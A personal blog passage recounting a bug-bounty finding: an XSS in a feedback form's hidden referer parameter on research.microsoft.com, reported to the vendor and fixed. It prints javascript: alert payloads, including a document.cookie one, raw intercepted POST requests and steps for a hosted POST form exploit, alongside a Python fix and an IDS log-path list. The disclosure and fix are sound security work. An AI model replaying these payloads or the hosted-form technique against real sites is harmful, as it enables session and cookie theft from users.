"/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice", "/var/log/news/suck.err", "/var/log/news/suck.notice",
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
"/var/log/ncftpd/misclog.txt", "/var/log/ncftpd.errs", "/var/log/auth"



So finally after 3 months we had completed our project & started making the report.

Link For Report   : http://www.slideshare.net/raghavbisht9/personal-final-report 
Download Project : https://github.com/raghav007bisht/Intrusion-Detection-System-IDS-v5.0

Monday, 4 January 2016

Post XSS At : "research.microsoft.com"

Hii
I am Raghav & this is the story of how I managed to get my name on the Microsoft Security Researcher Acknowledgements for Microsoft Online Services (November 2015).

NOTE : I am writing my first post, plus I am not a literature guy, so do ignore any typos & grammatical errors in my story.

Link : https://technet.microsoft.com/en-in/security/cc308589.aspx


I started my journey in January 2015 when I was working as a Security Consultant & one day I thought "what the fuck am I doing with my life?" & started asking myself some life changing questions. Although I had some experience & knowledge, as I had been having fun with hacking stuff since 2008. I was studying at high school then and liked to deface websites for fun, make viruses, use cryptography for cheating in exams & the list goes on...

So, I looked in the mirror & cursed the world & decided to switch from Security Consultant to Freelancer.
Now, if you are starting as a freelancer and you do not have any connections: Congratulations, "You Are Screwed !!!".
Your own parents will curse you, as you stick to them like a parasite, and your friends plus others will give uncountable bullshit advice.

So, putting all their advice in the trash, I started looking for bug bounty programs & registered myself on HackerOne, Bugcrowd, Cobalt etc... and started looking for public programs on vulnerability-lab, but the biggest mistake I made was that I started using vulnerability scanners: they gave me millions of false positives plus hundreds of duplicate results/reports and wasted exactly 2 months of my time...:(

Now, after being pinned to the ground & losing many times, I took my faith away from vulnerability scanners, started believing in myself and switched to manual vulnerability testing. As I was going to start testing I had to choose the target from the hundreds of publicly available programs. At that time I had started working with Python programming, so I opened the Python interpreter and made a random character generation program, 4 lines of easy code;
Here it goes ;
>>> import random
>>> import string
>>> a = string.letters
>>> random.choice(a)
Output : "w"

Now, I started searching the bounty programs starting with the letter "w" in "http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php"
& I chose the first target "Wamba" out of the other 10 programs.


After around 2-3 days of manual testing I got my first verified XSS bug, which paid off 150$ & a Hall of Fame.
Link :  http://corp.wamba.com/en/developer/security/?fame

So, finally I got a start...
Now one thing I knew for sure was that I had to give my best if I wanted to find bugs at top level dinosaurs like Microsoft, Google, Facebook etc...
so I started hunting for small fish in the pond for practice and I got many.

NOTE : Check my linkedIn profile for those fishes : https://in.linkedin.com/in/raghav-bisht-8a99b049

After exactly 8 months of practice & learning I chose Microsoft as my first target. You must be wondering why Microsoft? Because of its bug bounty scope. Their scope is wide as they are doing bug bounties for online services, products like Office, etc...

As my expertise is in web applications, I chose to go with their Online Services. Now I had to choose the target, as there are hundreds of domains, sub-domains etc. out there. Having the paranoia of being lucky I again opened my random Python program & this time it gave the letter "R".
So I scanned for sub-domains of microsoft using the Acunetix sub-domain scanner tool & I got the domain "http://research.microsoft.com/en-us/"

Now, testing begins...

On November 3rd 2015, in the morning at 2:19 AM, I reported my first bug to Microsoft, which was an "Open Redirection"


And I Failed....:(

Now on the same day, November 3rd 2015, in the afternoon at 1:27 PM, I reported a verified XSS bug to Microsoft.

NOTE : Exactly the same report :


Vulnerable Domain :
--------------------------------

http://research.microsoft.com/

Vulnerable Link :
---------------------------

http://research.microsoft.com/apps/mobile/feedback.aspx

Vulnerable Parameter :
-------------------------------------

hiddenReferer=

XSS Payload :
---------------------

javascript:alert(123456789)
javascript:alert(document.domain)
javascript:alert("XSS____ALERT_____!!!!_____:_____Hacked___By___Raghav")

Steps To Reproduce :
------------------------------
1. Go to vulnerable Link : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Put data in the form and click on submit; meanwhile add a proxy & intercept the HTTP request.
Then,
Find Vulnerable parameter : hiddenReferer=
&
Put XSS Payload : javascript:alert(123456789)
3. Forward The Request...

Original Request :
--------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093; A=I&I=AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D; _vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1; km_ai=FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26; WT_FPC=id=220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=; omniID=1445758143494_c04d_29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 452

__VIEWSTATE=%2FwEPDwUJLTgzMTg5OTc5ZGShzpE5tzmEw6CKkKDvGHntFLidc5imff8w7mu2zy%2FLMQ%3D%3D&__VIEWSTATEGENERATOR=716BEBFC&__EVENTVALIDATION=%2FwEdAARKJNO6sKLVvRzw7zztCu4VtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8s%2Fz5WZ7D4I2h2W9EhPlJLX2gF%2BinlORjyb3MDfBMo%2F9Y%3D&ctl00%24bodyPlaceholder%24hiddenReferer=&Content=1&Design=2&Usability=3&Overall=4&ctl00%24bodyPlaceholder%24commentTxt=asadas&ctl00%24bodyPlaceholder%24submitBtn=Submit

Edited Request :
-------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093; A=I&I=AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D; _vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1; km_ai=FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26; WT_FPC=id=220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=; omniID=1445758143494_c04d_29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 470

__VIEWSTATE=%2FwEPDwUJLTgzMTg5OTc5ZGTXCl2373301Rpe5vIISbXvtNenkjedT%2Bw1VGl4ldsRqw%3D%3D&__VIEWSTATEGENERATOR=716BEBFC&__EVENTVALIDATION=%2FwEdAAR2zlRPRPhJi19IJ5naZBSPtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8sBCl6HiMzAgi%2F4d3G3Luo2MkPYCKPbIHIh3MWPVPWxGM%3D&ctl00%24bodyPlaceholder%24hiddenReferer=javascript:alert(123456789)&Content=1&Design=2&Usability=3&Overall=4&ctl00%24bodyPlaceholder%24commentTxt=m&ctl00%24bodyPlaceholder%24submitBtn=Submit

Response :
------------------

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:23:06 GMT
Content-Length: 8961

NOTE : POC attached...!!!



And I Failed Again....:(

Now, as we all know, every story has 3 sections: the start, the mid & the "twist".

As my bug was shut down by the MSRC team & they said it was a "SELF-XSS", I had to make my bug impactful. For doing so,

1. I checked for the X-Frame-Options header in the response and checked whether the website could be framed inside an HTML <IFRAME> tag.

2. Always check with the document.cookie XSS payload <script>alert(document.cookie)</script>. In my case the document.cookie payload didn't work because I had not registered on the website & my browser did not contain any session. So, this was my mistake; then I registered on the site & applied the document.cookie payload, and the "Cookie" pop-up box appeared, which helped me to increase the severity of the bug.

 

So, my only task left was to make my bug severity as high as possible. For doing so;
Check out the exact words of my 3rd reply to the MSRC team...

Respected...
As per POC for my earlier mail...
That the POST XSS page can be created and it can be Exploited...[Source : http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html]
Steps To Reproduce For POST XSS Exploitation :
------------------------------------------------------------------------------


1. Save the vulnerable Page in local system : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Edit source code and add :

</p><form name="aspnetForm" method="post" action="http://research.microsoft.com/apps/mobile/feedback.aspx" id="aspnetForm">

<input name="ctl00$bodyPlaceholder$hiddenReferer" id="ctl00_bodyPlaceholder_hiddenReferer" type="hidden" value="javascript:alert(document.cookie)">

3. Run the page in the local system & click on submit.
4. When form is successfully submitted Click on  "Hyperlinked : Click" To Execute XSS Payload.
Conclusions :
---------------------

1. Attacker can host the page and ask for feedback.
2. Missing of "X-Frame-Options: sameorigin " Header in Response can give advantage to attacker for XFS Attack [Source : https://www.owasp.org/index.php/Cross_Frame_Scripting] [ POC Screenshot Attached : XFS-Microsoft.png ]
NOTE : Video POC, Screenshots & Edited POST Request Page Is Attached...!!!


Video POC : https://www.youtube.com/watch?v=uokq33ssLdc
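The server-side fix for the hiddenReferer sink, as an added example (my own Python, not Microsoft's ASP.NET code): the value only becomes the "Click" link's href when it is a same-site http(s) URL or a site-relative path, so the javascript: payloads above fall back to a default link, and the result is attribute-encoded before it is rendered. The host constant and function names are mine.

```python
import html
from urllib.parse import urlsplit

SITE_HOST = "research.microsoft.com"   # the only origin the back-link may point to
DEFAULT_BACK = "/"                     # constructed fallback target


def safe_back_link(referer_value, site_host=SITE_HOST):
    """Return an href that is safe to render, or DEFAULT_BACK.

    Only same-site http(s) URLs and site-relative paths pass; javascript:,
    data:, vbscript: and every other scheme, plus protocol-relative //host
    links, fall back to the default.
    """
    if not referer_value:
        return DEFAULT_BACK
    # Browsers drop ASCII tab/newline anywhere in a URL and trim controls and
    # spaces at the ends, so "java\tscript:" still runs; strip them all first.
    candidate = "".join(ch for ch in referer_value if ord(ch) > 0x20 and ord(ch) != 0x7f)
    parts = urlsplit(candidate)
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):
            return DEFAULT_BACK
        if parts.hostname != site_host.lower():
            return DEFAULT_BACK   # also catches http://site@evil/ and other-host links
        return candidate
    if candidate.startswith("/") and not candidate.startswith("//"):
        return candidate          # site-relative path
    return DEFAULT_BACK


def render_back_link(referer_value):
    """The anchor the feedback page prints after submit, with the href encoded."""
    return '<a href="%s">Click</a>' % html.escape(safe_back_link(referer_value), quote=True)
```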

So Finally On November 17th 2015 I got the confirmation of Bug Fixed...




Thank You....!!!!



- Raghav Bisht

Getting started with AMF Flash Application Penetration Testing !

What is Action Message Format (AMF) ? TL;DR; AMF is a binary message serialization format geared for remote procedure calls, native to the...